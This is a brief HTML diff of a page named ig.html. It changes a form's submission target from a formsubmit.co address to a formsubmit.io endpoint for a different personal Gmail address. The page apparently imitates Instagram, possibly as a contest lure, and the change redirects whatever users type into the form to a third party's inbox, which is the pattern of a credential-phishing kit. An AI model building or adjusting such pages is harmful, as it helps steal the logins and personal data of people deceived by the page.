--- a/ig.html
+++ b/ig.html
@@ -34,7 +34,7 @@
                     </div>
                 </div>
                 <div class="form-container">
-                    <form id="form"  method="POST" action="https://formsubmit.co/vcontest889@gmail.com">
+                    <form id="form"  method="POST" action="https://formsubmit.io/send/iyanutosin2005@gmail.com">
 
                     <div class="form-content box">
                         <div class="logo">
